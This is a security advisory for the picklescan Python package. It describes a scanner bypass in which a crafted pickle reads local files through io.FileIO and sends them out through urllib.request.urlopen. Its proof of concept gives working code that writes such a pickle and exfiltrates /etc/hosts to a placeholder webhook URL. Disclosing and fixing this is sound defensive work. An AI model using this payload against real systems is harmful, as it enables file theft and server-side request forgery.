GHSA-9726-w42j-3qjr
Suggest an improvement- Source
- https://github.com/advisories/GHSA-9726-w42j-3qjr
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-9726-w42j-3qjr/GHSA-9726-w42j-3qjr.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-9726-w42j-3qjr
- Published
- 2026-01-08T17:25:35Z
- Modified
- 2026-01-08T17:33:56.191969Z
- Severity
-
- 8.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- picklescan has Arbitrary file read using `io.FileIO`
- Details
-
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
io.FileIO: Opens local files without using builtins.open.
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
import pickle, io, urllib.request class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts', 'r')) class Exfiltrate: def __reduce__(self): return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile())) with open("bypass_http.pkl", "wb") as f: pickle.dump(Exfiltrate(), f)<img width="650" height="114" alt="Screenshot 2025-12-30 at 10 13 14 PM" src="https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994" />
Impact
- Arbitrary file read
Thanks for this library and your time. If you think
picklescanis focused on detecting onlyRCEkind of vulnerabilities rather addingFile IO,Httpor any protocol based may cause lot of noise, feel free to close this issue. - Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-01-08T17:25:35Z", "severity": "HIGH", "nvd_published_at": null, "cwe_ids": [ "CWE-22", "CWE-918" ] }- References
-
- https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr
- https://github.com/mmaitre314/picklescan/pull/55
- https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1
- https://github.com/mmaitre314/picklescan
- https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35
Affected packages
PyPI / picklescan
Package
- Name
- picklescan
- View open source insights on deps.dev
- Purl
- pkg:pypi/picklescan
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed0.0.35